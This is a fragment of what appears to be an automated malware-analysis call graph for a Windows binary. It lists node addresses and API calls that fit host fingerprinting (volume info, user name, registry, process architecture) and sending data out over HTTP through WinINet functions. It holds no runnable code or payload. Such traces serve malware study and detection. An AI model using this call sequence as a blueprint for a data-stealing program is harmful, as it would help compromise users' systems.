calls 70874->70875 70876 4030c6 70875->70876 70877 4043b0 2 API calls 70876->70877 70878 4030df 70877->70878 70879 4043b0 2 API calls 70878->70879 70880 4030f8 70879->70880 70881 4043b0 2 API calls 70880->70881 70882 403111 70881->70882 70883 4043b0 2 API calls 70882->70883 70884 40312a 70883->70884 70885 4043b0 2 API calls 70884->70885 70886 403143 70885->70886 70887 4043b0 2 API calls 70886->70887 70888 40315c 70887->70888 70889 4043b0 2 API calls 70888->70889 70890 403175 70889->70890 70891 4043b0 2 API calls 70890->70891 70892 40318e 70891->70892 70893 4043b0 2 API calls 70892->70893 70894 4031a7 70893->70894 70895 4043b0 2 API calls 70894->70895 70896 4031c0 70895->70896 70897 4043b0 2 API calls 70896->70897 70898 4031d9 70897->70898 70899 4043b0 2 API calls 70898->70899 70900 4031f2 70899->70900 70901 4043b0 2 API calls 70900->70901 70902 40320b 70901->70902 70903 4043b0 2 API calls 70902->70903 70904 403224 70903->70904 70905 4043b0 2 API calls 70904->70905 70906 40323d 70905->70906 70907 4043b0 2 API calls 70906->70907 70908 403256 70907->70908 70909 4043b0 2 API calls 70908->70909 70910 40326f 70909->70910 70911 4043b0 2 API calls 70910->70911 70912 403288 70911->70912 70913 4043b0 2 API calls 70912->70913 70914 4032a1 70913->70914 70915 4043b0 2 API calls 70914->70915 70916 4032ba 70915->70916 70917 4043b0 2 API calls 70916->70917 70918 4032d3 70917->70918 70919 4043b0 2 API calls 70918->70919 70920 4032ec 70919->70920 70921 4043b0 2 API calls 70920->70921 70922 403305 70921->70922 70923 4043b0 2 API calls 70922->70923 70924 40331e 70923->70924 70925 4043b0 2 API calls 70924->70925 70926 403337 70925->70926 70927 4043b0 2 API calls 70926->70927 70928 403350 70927->70928 70929 4043b0 2 API calls 70928->70929 70930 403369 70929->70930 70931 4043b0 2 API calls 70930->70931 70932 403382 70931->70932 70933 4043b0 2 API calls 70932->70933 70934 40339b 70933->70934 70935 4043b0 2 API calls 70934->70935 70936 4033b4 70935->70936 70937 4043b0 2 API calls 70936->70937 70938 4033cd 70937->70938 70939 4043b0 2 API calls 70938->70939 70940 4033e6 70939->70940 70941 4043b0 2 API calls 70940->70941 70942 4033ff 70941->70942 70943 4043b0 2 API calls 70942->70943 70944 403418 70943->70944 70945 4043b0 2 API calls 70944->70945 70946 403431 70945->70946 70947 4043b0 2 API calls 70946->70947 70948 40344a 70947->70948 70949 4043b0 2 API calls 70948->70949 70950 403463 70949->70950 70951 4043b0 2 API calls 70950->70951 70952 40347c 70951->70952 70953 4043b0 2 API calls 70952->70953 70954 403495 70953->70954 70955 4043b0 2 API calls 70954->70955 70956 4034ae 70955->70956 70957 4043b0 2 API calls 70956->70957 70958 4034c7 70957->70958 70959 4043b0 2 API calls 70958->70959 70960 4034e0 70959->70960 70961 4043b0 2 API calls 70960->70961 70962 4034f9 70961->70962 70963 4043b0 2 API calls 70962->70963 70964 403512 70963->70964 70965 4043b0 2 API calls 70964->70965 70966 40352b 70965->70966 70967 4043b0 2 API calls 70966->70967 70968 403544 70967->70968 70969 4043b0 2 API calls 70968->70969 70970 40355d 70969->70970 70971 4043b0 2 API calls 70970->70971 70972 403576 70971->70972 70973 4043b0 2 API calls 70972->70973 70974 40358f 70973->70974 70975 4043b0 2 API calls 70974->70975 70976 4035a8 70975->70976 70977 4043b0 2 API calls 70976->70977 70978 4035c1 70977->70978 70979 4043b0 2 API calls 70978->70979 70980 4035da 70979->70980 70981 4043b0 2 API calls 70980->70981 70982 4035f3 70981->70982 70983 4043b0 2 API calls 70982->70983 70984 40360c 70983->70984 70985 4043b0 2 API calls 70984->70985 70986 403625 70985->70986 70987 4043b0 2 API calls 70986->70987 70988 40363e 70987->70988 70989 4043b0 2 API calls 70988->70989 70990 403657 70989->70990 70991 4043b0 2 API calls 70990->70991 70992 403670 70991->70992 70993 4043b0 2 API calls 70992->70993 70994 403689 70993->70994 70995 4043b0 2 API calls 70994->70995 70996 4036a2 70995->70996 70997 4043b0 2 API calls 70996->70997 70998 4036bb 70997->70998 70999 4043b0 2 API calls 70998->70999 71000 4036d4 70999->71000 71001 4043b0 2 API calls 71000->71001 71002 4036ed 71001->71002 71003 4043b0 2 API calls 71002->71003 71004 403706 71003->71004 71005 4043b0 2 API calls 71004->71005 71006 40371f 71005->71006 71007 4043b0 2 API calls 71006->71007 71008 403738 71007->71008 71009 4043b0 2 API calls 71008->71009 71010 403751 71009->71010 71011 4043b0 2 API calls 71010->71011 71012 40376a 71011->71012 71013 4043b0 2 API calls 71012->71013 71014 403783 71013->71014 71015 4043b0 2 API calls 71014->71015 71016 40379c 71015->71016 71017 4043b0 2 API calls 71016->71017 71018 4037b5 71017->71018 71019 4043b0 2 API calls 71018->71019 71020 4037ce 71019->71020 71021 4043b0 2 API calls 71020->71021 71022 4037e7 71021->71022 71023 4043b0 2 API calls 71022->71023 71024 403800 71023->71024 71025 4043b0 2 API calls 71024->71025 71026 403819 71025->71026 71027 4043b0 2 API calls 71026->71027 71028 403832 71027->71028 71029 4043b0 2 API calls 71028->71029 71030 40384b 71029->71030 71031 4043b0 2 API calls 71030->71031 71032 403864 71031->71032 71033 4043b0 2 API calls 71032->71033 71034 40387d 71033->71034 71035 4043b0 2 API calls 71034->71035 71036 403896 71035->71036 71037 4043b0 2 API calls 71036->71037 71038 4038af 71037->71038 71039 4043b0 2 API calls 71038->71039 71040 4038c8 71039->71040 71041 4043b0 2 API calls 71040->71041 71042 4038e1 71041->71042 71043 4043b0 2 API calls 71042->71043 71044 4038fa 71043->71044 71045 4043b0 2 API calls 71044->71045 71046 403913 71045->71046 71047 4043b0 2 API calls 71046->71047 71048 40392c 71047->71048 71049 4043b0 2 API calls 71048->71049 71050 403945 71049->71050 71051 4043b0 2 API calls 71050->71051 71052 40395e 71051->71052 71053 4043b0 2 API calls 71052->71053 71054 403977 71053->71054 71055 4043b0 2 API calls 71054->71055 71056 403990 71055->71056 71057 4043b0 2 API calls 71056->71057 71058 4039a9 71057->71058 71059 4043b0 2 API calls 71058->71059 71060 4039c2 71059->71060 71061 4043b0 2 API calls 71060->71061 71062 4039db 71061->71062 71063 4043b0 2 API calls 71062->71063 71064 4039f4 71063->71064 71065 4043b0 2 API calls 71064->71065 71066 403a0d 71065->71066 71067 4043b0 2 API calls 71066->71067 71068 403a26 71067->71068 71069 4043b0 2 API calls 71068->71069 71070 403a3f 71069->71070 71071 4043b0 2 API calls 71070->71071 71072 403a58 71071->71072 71073 4043b0 2 API calls 71072->71073 71074 403a71 71073->71074 71075 4043b0 2 API calls 71074->71075 71076 403a8a 71075->71076 71077 4043b0 2 API calls 71076->71077 71078 403aa3 71077->71078 71079 4043b0 2 API calls 71078->71079 71080 403abc 71079->71080 71081 4043b0 2 API calls 71080->71081 71082 403ad5 71081->71082 71083 4043b0 2 API calls 71082->71083 71084 403aee 71083->71084 71085 4043b0 2 API calls 71084->71085 71086 403b07 71085->71086 71087 4043b0 2 API calls 71086->71087 71088 403b20 71087->71088 71089 4043b0 2 API calls 71088->71089 71090 403b39 71089->71090 71091 4043b0 2 API calls 71090->71091 71092 403b52 71091->71092 71093 4043b0 2 API calls 71092->71093 71094 403b6b 71093->71094 71095 4043b0 2 API calls 71094->71095 71096 403b84 71095->71096 71097 4043b0 2 API calls 71096->71097 71098 403b9d 71097->71098 71099 4043b0 2 API calls 71098->71099 71100 403bb6 71099->71100 71101 4043b0 2 API calls 71100->71101 71102 403bcf 71101->71102 71103 4043b0 2 API calls 71102->71103 71104 403be8 71103->71104 71105 4043b0 2 API calls 71104->71105 71106 403c01 71105->71106 71107 4043b0 2 API calls 71106->71107 71108 403c1a 71107->71108 71109 4043b0 2 API calls 71108->71109 71110 403c33 71109->71110 71111 4043b0 2 API calls 71110->71111 71112 403c4c 71111->71112 71113 4043b0 2 API calls 71112->71113 71114 403c65 71113->71114 71115 4043b0 2 API calls 71114->71115 71116 403c7e 71115->71116 71117 4043b0 2 API calls 71116->71117 71118 403c97 71117->71118 71119 4043b0 2 API calls 71118->71119 71120 403cb0 71119->71120 71121 4043b0 2 API calls 71120->71121 71122 403cc9 71121->71122 71123 4043b0 2 API calls 71122->71123 71124 403ce2 71123->71124 71125 4043b0 2 API calls 71124->71125 71126 403cfb 71125->71126 71127 4043b0 2 API calls 71126->71127 71128 403d14 71127->71128 71129 4043b0 2 API calls 71128->71129 71130 403d2d 71129->71130 71131 4043b0 2 API calls 71130->71131 71132 403d46 71131->71132 71133 4043b0 2 API calls 71132->71133 71134 403d5f 71133->71134 71135 4043b0 2 API calls 71134->71135 71136 403d78 71135->71136 71137 4043b0 2 API calls 71136->71137 71138 403d91 71137->71138 71139 4043b0 2 API calls 71138->71139 71140 403daa 71139->71140 71141 4043b0 2 API calls 71140->71141 71142 403dc3 71141->71142 71143 4043b0 2 API calls 71142->71143 71144 403ddc 71143->71144 71145 4043b0 2 API calls 71144->71145 71146 403df5 71145->71146 71147 4043b0 2 API calls 71146->71147 71148 403e0e 71147->71148 71149 4043b0 2 API calls 71148->71149 71150 403e27 71149->71150 71151 4043b0 2 API calls 71150->71151 71152 403e40 71151->71152 71153 4043b0 2 API calls 71152->71153 71154 403e59 71153->71154 71155 4043b0 2 API calls 71154->71155 71156 403e72 71155->71156 71157 4043b0 2 API calls 71156->71157 71158 403e8b 71157->71158 71159 4043b0 2 API calls 71158->71159 71160 403ea4 71159->71160 71161 4043b0 2 API calls 71160->71161 71162 403ebd 71161->71162 71163 4043b0 2 API calls 71162->71163 71164 403ed6 71163->71164 71165 4043b0 2 API calls 71164->71165 71166 403eef 71165->71166 71167 4043b0 2 API calls 71166->71167 71168 403f08 71167->71168 71169 4043b0 2 API calls 71168->71169 71170 403f21 71169->71170 71171 4043b0 2 API calls 71170->71171 71172 403f3a 71171->71172 71173 4043b0 2 API calls 71172->71173 71174 403f53 71173->71174 71175 4043b0 2 API calls 71174->71175 71176 403f6c 71175->71176 71177 4043b0 2 API calls 71176->71177 71178 403f85 71177->71178 71179 4043b0 2 API calls 71178->71179 71180 403f9e 71179->71180 71181 4043b0 2 API calls 71180->71181 71182 403fb7 71181->71182 71183 4043b0 2 API calls 71182->71183 71184 403fd0 71183->71184 71185 4043b0 2 API calls 71184->71185 71186 403fe9 71185->71186 71187 4043b0 2 API calls 71186->71187 71188 404002 71187->71188 71189 4043b0 2 API calls 71188->71189 71190 40401b 71189->71190 71191 4043b0 2 API calls 71190->71191 71192 404034 71191->71192 71193 4043b0 2 API calls 71192->71193 71194 40404d 71193->71194 71195 4043b0 2 API calls 71194->71195 71196 404066 71195->71196 71197 4043b0 2 API calls 71196->71197 71198 40407f 71197->71198 71199 4043b0 2 API calls 71198->71199 71200 404098 71199->71200 71201 4043b0 2 API calls 71200->71201 71202 4040b1 71201->71202 71203 4043b0 2 API calls 71202->71203 71204 4040ca 71203->71204 71205 4043b0 2 API calls 71204->71205 71206 4040e3 71205->71206 71207 4043b0 2 API calls 71206->71207 71208 4040fc 71207->71208 71209 4043b0 2 API calls 71208->71209 71210 404115 71209->71210 71211 4043b0 2 API calls 71210->71211 71212 40412e 71211->71212 71213 4043b0 2 API calls 71212->71213 71214 404147 71213->71214 71215 4043b0 2 API calls 71214->71215 71216 404160 71215->71216 71217 4043b0 2 API calls 71216->71217 71218 404179 71217->71218 71219 4043b0 2 API calls 71218->71219 71220 404192 71219->71220 71221 4043b0 2 API calls 71220->71221 71222 4041ab 71221->71222 71223 4043b0 2 API calls 71222->71223 71224 4041c4 71223->71224 71225 4043b0 2 API calls 71224->71225 71226 4041dd 71225->71226 71227 4043b0 2 API calls 71226->71227 71228 4041f6 71227->71228 71229 4043b0 2 API calls 71228->71229 71230 40420f 71229->71230 71231 4043b0 2 API calls 71230->71231 71232 404228 71231->71232 71233 4043b0 2 API calls 71232->71233 71234 404241 71233->71234 71235 4043b0 2 API calls 71234->71235 71236 40425a 71235->71236 71237 4043b0 2 API calls 71236->71237 71238 404273 71237->71238 71239 4043b0 2 API calls 71238->71239 71240 40428c 71239->71240 71241 4043b0 2 API calls 71240->71241 71242 4042a5 71241->71242 71243 4043b0 2 API calls 71242->71243 71244 4042be 71243->71244 71245 4043b0 2 API calls 71244->71245 71246 4042d7 71245->71246 71247 4043b0 2 API calls 71246->71247 71248 4042f0 71247->71248 71249 4043b0 2 API calls 71248->71249 71250 404309 71249->71250 71251 4043b0 2 API calls 71250->71251 71252 404322 71251->71252 71253 4043b0 2 API calls 71252->71253 71254 40433b 71253->71254 71255 4043b0 2 API calls 71254->71255 71256 404354 71255->71256 71257 4043b0 2 API calls 71256->71257 71258 40436d 71257->71258 71259 4043b0 2 API calls 71258->71259 71260 404386 71259->71260 71261 4043b0 2 API calls 71260->71261 71262 40439f 71261->71262 71263 416240 71262->71263 71264 416250 43 API calls 71263->71264 71265 416666 8 API calls 71263->71265 71264->71265 71266 416776 71265->71266 71267 4166fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71265->71267 71268 416783 8 API calls 71266->71268 71269 416846 71266->71269 71267->71266 71268->71269 71270 4168c8 71269->71270 71271 41684f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71269->71271 71272 4168d5 6 API calls 71270->71272 71273 416967 71270->71273 71271->71270 71272->71273 71274 416974 9 API calls 71273->71274 71275 416a4f 71273->71275 71274->71275 71276 416ad2 71275->71276 71277 416a58 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71275->71277 71278 416adb GetProcAddress GetProcAddress 71276->71278 71279 416b0c 71276->71279 71277->71276 71278->71279 71280 416b45 71279->71280 71281 416b15 GetProcAddress GetProcAddress 71279->71281 71282 416b52 8 API calls 71280->71282 71283 416c15 71280->71283 71281->71280 71282->71283 71284 416c7f 71283->71284 71285 416c1e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71283->71285 71286 416ca1 71284->71286 71287 416c88 GetProcAddress 71284->71287 71285->71284 71288 412cc6 71286->71288 71289 416caa GetProcAddress GetProcAddress GetProcAddress GetProcAddress 71286->71289 71287->71286 71288->70474 71289->71288 71291 4141f0 GetVolumeInformationA 71290->71291 71292 4141e9 71290->71292 71298 41422e 71291->71298 71292->71291 71293 414299 GetProcessHeap HeapAlloc 71294 4142c5 wsprintfA 71293->71294 71295 4142b6 71293->71295 71297 416d40 lstrcpy 71294->71297 71296 416d40 lstrcpy 71295->71296 71299 412d94 71296->71299 71297->71299 71298->71293 71299->70494 71301 416da0 lstrcpy 71300->71301 71302 404559 71301->71302 72320 404470 71302->72320 71304 404565 71305 416d40 lstrcpy 71304->71305 71306 404597 71305->71306 71307 416d40 lstrcpy 71306->71307 71308 4045a4 71307->71308 71309 416d40 lstrcpy 71308->71309 71310 4045b1 71309->71310 71311 416d40 lstrcpy 71310->71311 71312 4045be 71311->71312 71313 416d40 lstrcpy 71312->71313 71314 4045cb InternetOpenA StrCmpCA 71313->71314 71315 404604 71314->71315 71316 404b8b InternetCloseHandle 71315->71316 72332 415260 71315->72332 71318 404ba8 71316->71318 72347 4094a0 CryptStringToBinaryA 71318->72347 71319 404623 72340 416f20 71319->72340 71323 404636 71324 416ea0 lstrcpy 71323->71324 71329 40463f 71324->71329 71325 416e20 2 API calls 71326 404bc5 71325->71326 71327 416fb0 4 API calls 71326->71327 71330 404bdb 71327->71330 71328 404be7 moneypunct 71332 416da0 lstrcpy 71328->71332 71333 416fb0 4 API calls 71329->71333 71331 416ea0 lstrcpy 71330->71331 71331->71328 71345 404c17 71332->71345 71334 404669 71333->71334 71335 416ea0 lstrcpy 71334->71335 71336 404672 71335->71336 71337 416fb0 4 API calls 71336->71337 71338 404691 71337->71338 71339 416ea0 lstrcpy 71338->71339 71340 40469a 71339->71340 71341 416f20 3 API calls 71340->71341 71342 4046b8 71341->71342 71343 416ea0 lstrcpy 71342->71343 71344 4046c1 71343->71344 71346 416fb0 4 API calls 71344->71346 71345->70497 71347 4046e0 71346->71347 71348 416ea0 lstrcpy 71347->71348 71349 4046e9 71348->71349 71350 416fb0 4 API calls 71349->71350 71351 404708 71350->71351 71352 416ea0 lstrcpy 71351->71352 71353 404711 71352->71353 71354 416fb0 4 API calls 71353->71354 71355 40473d 71354->71355 71356 416f20 3 API calls 71355->71356 71357 404744 71356->71357 71358 416ea0 lstrcpy 71357->71358 71359 40474d 71358->71359 71360 404763 InternetConnectA 71359->71360 71360->71316 71361 404793 HttpOpenRequestA 71360->71361 71363 4047e8 71361->71363 71364 404b7e InternetCloseHandle 71361->71364 71365 416fb0 4 API calls 71363->71365 71364->71316 71366 4047fc 71365->71366 71367 416ea0 lstrcpy 71366->71367 71368 404805 71367->71368 71369 416f20 3 API calls 71368->71369 71370 404823 71369->71370 71371 416ea0 lstrcpy 71370->71371 71372 40482c 71371->71372 71373 416fb0 4 API calls 71372->71373 71374 40484b 71373->71374 71375 416ea0 lstrcpy 71374->71375 71376 404854 71375->71376 71377 416fb0 4 API calls 71376->71377 71378 404875 71377->71378 71379 416ea0 lstrcpy 71378->71379 71380 40487e 71379->71380 71381 416fb0 4 API calls 71380->71381 71382 40489e 71381->71382 71383 416ea0 lstrcpy 71382->71383 71384 4048a7 71383->71384 71385 416fb0 4 API calls 71384->71385 71386 4048c6 71385->71386 71387 416ea0 lstrcpy 71386->71387 71388 4048cf 71387->71388 71389 416f20 3 API calls 71388->71389 71390 4048ed 71389->71390 71391 416ea0 lstrcpy 71390->71391 71392 4048f6 71391->71392 71393 416fb0 4 API calls 71392->71393 71394 404915 71393->71394 71395 416ea0 lstrcpy 71394->71395 71396 40491e 71395->71396 71397 416fb0 4 API calls 71396->71397 71398 40493d 71397->71398 71399 416ea0 lstrcpy 71398->71399 71400 404946 71399->71400 71401 416f20 3 API calls 71400->71401 71402 404964 71401->71402 71403 416ea0 lstrcpy 71402->71403 71404 40496d 71403->71404 71405 416fb0 4 API calls 71404->71405 71406 40498c 71405->71406 71407 416ea0 lstrcpy 71406->71407 71408 404995 71407->71408 71409 416fb0 4 API calls 71408->71409 71410 4049b6 71409->71410 71411 416ea0 lstrcpy 71410->71411 71412 4049bf 71411->71412 71413 416fb0 4 API calls 71412->71413 71414 4049df 71413->71414 71415 416ea0 lstrcpy 71414->71415 71416 4049e8 71415->71416 71417 416fb0 4 API calls 71416->71417 71418 404a07 71417->71418 71419 416ea0 lstrcpy 71418->71419 71420 404a10 71419->71420 71421 416f20 3 API calls 71420->71421 71422 404a2e 71421->71422 71423 416ea0 lstrcpy 71422->71423 71424 404a37 71423->71424 71425 416d40 lstrcpy 71424->71425 71426 404a52 71425->71426 71427 416f20 3 API calls 71426->71427 71428 404a73 71427->71428 71429 416f20 3 API calls 71428->71429 71430 404a7a 71429->71430 71431 416ea0 lstrcpy 71430->71431 71432 404a86 71431->71432 71433 404aa7 lstrlen 71432->71433 71434 404aba 71433->71434 71435 404ac3 lstrlen 71434->71435 72346 4170d0 71435->72346 71437 404ad3 HttpSendRequestA 71438 404af2 InternetReadFile 71437->71438 71439 404b27 InternetCloseHandle 71438->71439 71444 404b1e 71438->71444 71442 416e00 71439->71442 71441 416fb0 4 API calls 71441->71444 71442->71364 71443 416ea0 lstrcpy 71443->71444 71444->71438 71444->71439 71444->71441 71444->71443 72356 4170d0 71445->72356 71447 40fb04 StrCmpCA 71448 40fb17 71447->71448 71449 40fb0f ExitProcess 71447->71449 71450 40fb27 strtok_s 71448->71450 71462 40fb34 71450->71462 71451 40fccc 71451->70499 71452 40fca8 strtok_s 71452->71462 71453 40fc8b StrCmpCA 71453->71452 71453->71462 71454 40fc6c StrCmpCA 71454->71462 71455 40fb9d StrCmpCA 71455->71462 71456 40fbed StrCmpCA 71456->71462 71457 40fc4d StrCmpCA 71457->71462 71458 40fc2e StrCmpCA 71458->71462 71459 40fbbf StrCmpCA 71459->71462 71460 40fc0f StrCmpCA 71460->71462 71461 416e20 lstrlen lstrcpy 71461->71462 71462->71451 71462->71452 71462->71453 71462->71454 71462->71455 71462->71456 71462->71457 71462->71458 71462->71459 71462->71460 71462->71461 71464 416da0 lstrcpy 71463->71464 71465 401513 71464->71465 71466 416da0 lstrcpy 71465->71466 71467 401525 71466->71467 71468 416da0 lstrcpy 71467->71468 71469 401537 71468->71469 71470 416da0 lstrcpy 71469->71470 71471 401549 71470->71471 71472 405610 71471->71472 71473 416da0 lstrcpy 71472->71473 71474 405629 71473->71474 71475 404470 3 API calls 71474->71475 71476 405635 71475->71476 71477 416d40 lstrcpy 71476->71477 71478 40566a 71477->71478 71479 416d40 lstrcpy 71478->71479 71480 405677 71479->71480 71481 416d40 lstrcpy 71480->71481 71482 405684 71481->71482 71483 416d40 lstrcpy 71482->71483 71484 405691 71483->71484 71485 416d40 lstrcpy 71484->71485 71486 40569e InternetOpenA StrCmpCA 71485->71486 71487 4056cd 71486->71487 71488 405c70 InternetCloseHandle 71487->71488 71490 415260 3 API calls 71487->71490 71489 405c8d 71488->71489 71492 4094a0 4 API calls 71489->71492 71491 4056ec 71490->71491 71493 416f20 3 API calls 71491->71493 71494 405c93 71492->71494 71495 4056ff 71493->71495 71497 416e20 2 API calls 71494->71497 71500 405ccc moneypunct 71494->71500 71496 416ea0 lstrcpy 71495->71496 71502 405708 71496->71502 71498 405caa 71497->71498 71499 416fb0 4 API calls 71498->71499 71501 405cc0 71499->71501 71504 416da0 lstrcpy 71500->71504 71503 416ea0 lstrcpy 71501->71503 71505 416fb0 4 API calls 71502->71505 71503->71500 71514 405cfc 71504->71514 71506 405732 71505->71506 71507 416ea0 lstrcpy 71506->71507 71508 40573b 71507->71508 71509 416fb0 4 API calls 71508->71509 71510 40575a 71509->71510 71511 416ea0 lstrcpy 71510->71511 71512 405763 71511->71512 71513 416f20 3 API calls 71512->71513 71515 405781 71513->71515 71514->70505 71516 416ea0 lstrcpy 71515->71516 71517 40578a 71516->71517 71518 416fb0 4 API calls 71517->71518 71519 4057a9 71518->71519 71520 416ea0 lstrcpy 71519->71520 71521 4057b2 71520->71521 71522 416fb0 4 API calls 71521->71522 71523 4057d1 71522->71523 71524 416ea0 lstrcpy 71523->71524 71525 4057da 71524->71525 71526 416fb0 4 API calls 71525->71526 71527 405806 71526->71527 71528 416f20 3 API calls 71527->71528 71529 40580d 71528->71529 71530 416ea0 lstrcpy 71529->71530 71531 405816 71530->71531 71532 40582c InternetConnectA 71531->71532 71532->71488 71533 40585c HttpOpenRequestA 71532->71533 71535 405c63 InternetCloseHandle 71533->71535 71536 4058bb 71533->71536 71535->71488 71537 416fb0 4 API calls 71536->71537 71538 4058cf 71537->71538 71539 416ea0 lstrcpy 71538->71539 71540 4058d8 71539->71540 71541 416f20 3 API calls 71540->71541 71542 4058f6 71541->71542 71543 416ea0 lstrcpy 71542->71543 71544 4058ff 71543->71544 71545 416fb0 4 API calls 71544->71545 71546 40591e 71545->71546 71547 416ea0 lstrcpy 71546->71547 71548 405927 71547->71548 71549 416fb0 4 API calls 71548->71549 71550 405948 71549->71550 71551 416ea0 lstrcpy 71550->71551 71552 405951 71551->71552 71553 416fb0 4 API calls 71552->71553 71554 405971 71553->71554 71555 416ea0 lstrcpy 71554->71555 71556 40597a 71555->71556 71557 416fb0 4 API calls 71556->71557 71558 405999 71557->71558 71559 416ea0 lstrcpy 71558->71559 71560 4059a2 71559->71560 71561 416f20 3 API calls 71560->71561 71562 4059c0 71561->71562 71563 416ea0 lstrcpy 71562->71563 71564 4059c9 71563->71564 71565 416fb0 4 API calls 71564->71565 71566 4059e8 71565->71566 71567 416ea0 lstrcpy 71566->71567 71568 4059f1 71567->71568 71569 416fb0 4 API calls 71568->71569 71570 405a10 71569->71570 71571 416ea0 lstrcpy 71570->71571 71572 405a19 71571->71572 71573 416f20 3 API calls 71572->71573 71574 405a37 71573->71574 71575 416ea0 lstrcpy 71574->71575 71576 405a40 71575->71576 71577 416fb0 4 API calls 71576->71577 71578 405a5f 71577->71578 71579 416ea0 lstrcpy 71578->71579 71580 405a68 71579->71580 71581 416fb0 4 API calls 71580->71581 71582 405a89 71581->71582 71583 416ea0 lstrcpy 71582->71583 71584 405a92 71583->71584 71585 416fb0 4 API calls 71584->71585 71586 405ab2 71585->71586 71587 416ea0 lstrcpy 71586->71587 71588 405abb 71587->71588 71589 416fb0 4 API calls 71588->71589 71590 405ada 71589->71590 71591 416ea0 lstrcpy 71590->71591 71592 405ae3 71591->71592 71593 416f20 3 API calls 71592->71593 71594 405b01 71593->71594 71595 416ea0 lstrcpy 71594->71595 71596 405b0a 71595->71596 71597 405b1d lstrlen 71596->71597 72357 4170d0 71597->72357 71599 405b2e lstrlen GetProcessHeap HeapAlloc 72358 4170d0 71599->72358 71601 405b5b lstrlen 72359 4170d0 71601->72359 71603 405b6b memcpy 72360 4170d0 71603->72360 71605 405b84 lstrlen 71606 405b94 71605->71606 71607 405b9d lstrlen memcpy 71606->71607 72361 4170d0 71607->72361 71609 405bc7 lstrlen 72362 4170d0 71609->72362 71611 405bd7 HttpSendRequestA 71612 405be2 InternetReadFile 71611->71612 71613 405c17 InternetCloseHandle 71612->71613 71617 405c0e 71612->71617 71613->71535 71615 416fb0 4 API calls 71615->71617 71616 416ea0 lstrcpy 71616->71617 71617->71612 71617->71613 71617->71615 71617->71616 72363 4170d0 71618->72363 71620 40f3d7 strtok_s 71623 40f3e4 71620->71623 71621 40f4b1 71621->70507 71622 40f48d strtok_s 71622->71623 71623->71621 71623->71622 71624 416e20 lstrlen lstrcpy 71623->71624 71624->71623 72364 4170d0 71625->72364 71627 40f227 strtok_s 71630 40f234 71627->71630 71628 40f387 71628->70515 71629 40f363 strtok_s 71629->71630 71630->71628 71630->71629 71631 40f314 StrCmpCA 71630->71631 71632 40f297 StrCmpCA 71630->71632 71633 40f2d7 StrCmpCA 71630->71633 71634 416e20 lstrlen lstrcpy 71630->71634 71631->71630 71632->71630 71633->71630 71634->71630 71636 416d40 lstrcpy 71635->71636 71637 40fd26 71636->71637 71638 416fb0 4 API calls 71637->71638 71639 40fd37 71638->71639 71640 416ea0 lstrcpy 71639->71640 71641 40fd40 71640->71641 71642 416fb0 4 API calls 71641->71642 71643 40fd5b 71642->71643 71644 416ea0 lstrcpy 71643->71644 71645 40fd64 71644->71645 71646 416fb0 4 API calls 71645->71646 71647 40fd7d 71646->71647 71648 416ea0 lstrcpy 71647->71648 71649 40fd86 71648->71649 71650 416fb0 4 API calls 71649->71650 71651 40fda1 71650->71651 71652 416ea0 lstrcpy 71651->71652 71653 40fdaa 71652->71653 71654 416fb0 4 API calls 71653->71654 71655 40fdc3 71654->71655 71656 416ea0 lstrcpy 71655->71656 71657 40fdcc 71656->71657 71658 416fb0 4 API calls 71657->71658 71659 40fde7 71658->71659 71660 416ea0 lstrcpy 71659->71660 71661 40fdf0 71660->71661 71662 416fb0 4 API calls 71661->71662 71663 40fe09 71662->71663 71664 416ea0 lstrcpy 71663->71664 71665 40fe12 71664->71665 71666 416fb0 4 API calls 71665->71666 71667 40fe2d 71666->71667 71668 416ea0 lstrcpy 71667->71668 71669 40fe36 71668->71669 71670 416fb0 4 API calls 71669->71670 71671 40fe4f 71670->71671 71672 416ea0 lstrcpy 71671->71672 71673 40fe58 71672->71673 71674 416fb0 4 API calls 71673->71674 71675 40fe76 71674->71675 71676 416ea0 lstrcpy 71675->71676 71677 40fe7f 71676->71677 71678 4141c0 6 API calls 71677->71678 71679 40fe96 71678->71679 71680 416f20 3 API calls 71679->71680 71681 40fea9 71680->71681 71682 416ea0 lstrcpy 71681->71682 71683 40feb2 71682->71683 71684 416fb0 4 API calls 71683->71684 71685 40fedc 71684->71685 71686 416ea0 lstrcpy 71685->71686 71687 40fee5 71686->71687 71688 416fb0 4 API calls 71687->71688 71689 40ff05 71688->71689 71690 416ea0 lstrcpy 71689->71690 71691 40ff0e 71690->71691 72365 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 71691->72365 71693 40ff1e 71694 416fb0 4 API calls 71693->71694 71695 40ff2e 71694->71695 71696 416ea0 lstrcpy 71695->71696 71697 40ff37 71696->71697 71698 416fb0 4 API calls 71697->71698 71699 40ff56 71698->71699 71700 416ea0 lstrcpy 71699->71700 71701 40ff5f 71700->71701 71702 416fb0 4 API calls 71701->71702 71703 40ff80 71702->71703 71704 416ea0 lstrcpy 71703->71704 71705 40ff89 71704->71705 72368 414380 GetCurrentProcess IsWow64Process 71705->72368 71708 416fb0 4 API calls 71709 40ffa9 71708->71709 71710 416ea0 lstrcpy 71709->71710 71711 40ffb2 71710->71711 71712 416fb0 4 API calls 71711->71712 71713 40ffd1 71712->71713 71714 416ea0 lstrcpy 71713->71714 71715 40ffda 71714->71715 71716 416fb0 4 API calls 71715->71716 71717 40fffb 71716->71717 71718 416ea0 lstrcpy 71717->71718 71719 410004 71718->71719 72370 4143c0 GetProcessHeap HeapAlloc GetUserNameA 71719->72370 71721 410014 71722 416fb0 4 API calls 71721->71722 71723 410024 71722->71723 71724 416ea0 lstrcpy 71723->71724 71725 41002d 71724->71725 71726 416fb0 4 API calls 71725->71726 71727 41004c 71726->71727 71728 416ea0 lstrcpy 71727->71728 71729 410055 71728->71729 71730 416fb0 4 API calls 71729->71730 71731 410075 71730->71731 71732 416ea0 lstrcpy 71731->71732 71733 41007e 71732->71733 71734 414400 3 API calls 71733->71734 71735 41008e 71734->71735 71736 416fb0 4 API calls 71735->71736 71737 41009e 71736->71737 71738 416ea0 lstrcpy 71737->71738 71739 4100a7 71738->71739 71740 416fb0 4 API calls 71739->71740 71741 4100c6 71740->71741 71742 416ea0 lstrcpy 71741->71742 71743 4100cf 71742->71743 71744 416fb0 4 API calls 71743->71744 71745 4100f0 71744->71745 71746 416ea0 lstrcpy 71745->71746 71747 4100f9 71746->71747 72371 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 71747->72371 71749 410109 71750 